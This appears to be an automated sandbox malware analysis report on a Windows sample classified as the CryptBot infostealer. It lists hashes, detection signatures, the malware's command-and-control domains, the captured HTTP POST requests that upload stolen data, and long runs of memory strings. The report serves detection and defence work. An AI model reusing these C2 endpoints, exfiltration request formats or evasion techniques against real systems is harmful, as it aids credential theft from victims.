Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561847
MD5: 4d727ea77c6a382bccbb1ee8970b67ee
SHA1: 9b7899c63a601a2421715a6304c0f53af14f7b1a
SHA256: 25ac0cfb064bd71d2d97aad7491824915a7bbdc4b80e705385617dbd0e35a673
Tags: exe, user-Bitsight

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe Avira: detected
Source: file.exe.2828.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["Desktopn.top", "home.fvtekk5pn.top"]}
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Source: file.exe ReversingLabs: Detection: 36%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_002D15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_6C5E14B0
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_0af077cb-2
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 9_2_002D81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C600860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6AC920
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BF960h 9_2_6C5FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C676BF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C6884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C60C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C600740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 9_2_6C680730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 9_2_6C63A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C600260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C6BD014h] 9_2_6C6B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C657D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C653840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 9_2_6C60D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C61BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C61BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C65B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C60D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 9_2_6C60D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_6C659600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BDFF4h 9_2_6C653690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 9_2_6C60D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C683140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C5FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C65B1F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C5FB241
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C60D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C6773A0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 27MB

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49752 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49762 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49791 -> 34.116.198.130:80
Source: Malware configuration extractor URLs: Desktopn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1 Host: home.fvtekk5pn.top Accept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 461 Content-Type: multipart/form-data; boundary=------------------------iibd4tTPtuSlsLIa3ywm7p Content-Disposition: form-data; name="file"; filename="Reriruluw.bin" Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 89582 Content-Type: multipart/form-data; boundary=------------------------RkzlTwzHEIOpy2QOCA4s3E
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 30402 Content-Type: multipart/form-data; boundary=------------------------pP2o6FJ7kQsfThYLn8QyWX
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 461 Content-Type: multipart/form-data; boundary=------------------------iibd4tTPtuSlsLIa3ywm7p Content-Disposition: form-data; name="file"; filename="Reriruluw.bin" Content-Type: application/octet-stream
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.2318256428.00000000019DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
Source: file.exe, 00000000.00000003.2318256428.00000000019DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW173201934735a1
Source: chrome.exe, 00000003.00000003.2476683583.0000002400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2476736567.00000024010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2476310984.0000002400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2476578409.0000002401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478373306.00000024002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2476605123.00000024010D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000003.00000002.2480637100.00000024009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs$
Source: chrome.exe, 00000003.00000002.2480605372.00000024009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000003.00000002.2480685635.00000024009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000003.00000002.2477646786.000000240008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000003.00000002.2478900294.00000024004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478660646.00000024003B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000003.00000002.2481281814.0000002400B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000003.00000002.2478755946.0000002400460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481541459.0000002400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480894738.0000002400A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2477646786.000000240008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000003.00000002.2478755946.0000002400460000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard$F
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000003.00000002.2481281814.0000002400B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000003.00000002.2480760236.0000002400A24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000003.00000002.2477690698.00000024000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000003.00000002.2477690698.00000024000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000003.00000002.2477690698.00000024000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000003.00000002.2477646786.000000240008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845d
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574e
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162d
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320a
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320d
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369d
Source: chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369f
Source: chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481484639.0000002400C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489d
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604d
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714d
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847d
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473163614.0000002400E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473135228.0000002400380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000003.00000002.2481341181.0000002400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899d
Source: chrome.exe, 00000003.00000002.2479011220.000000240051C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479884633.0000002400750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2481395401.0000002400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000003.00000002.2481419583.0000002400C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
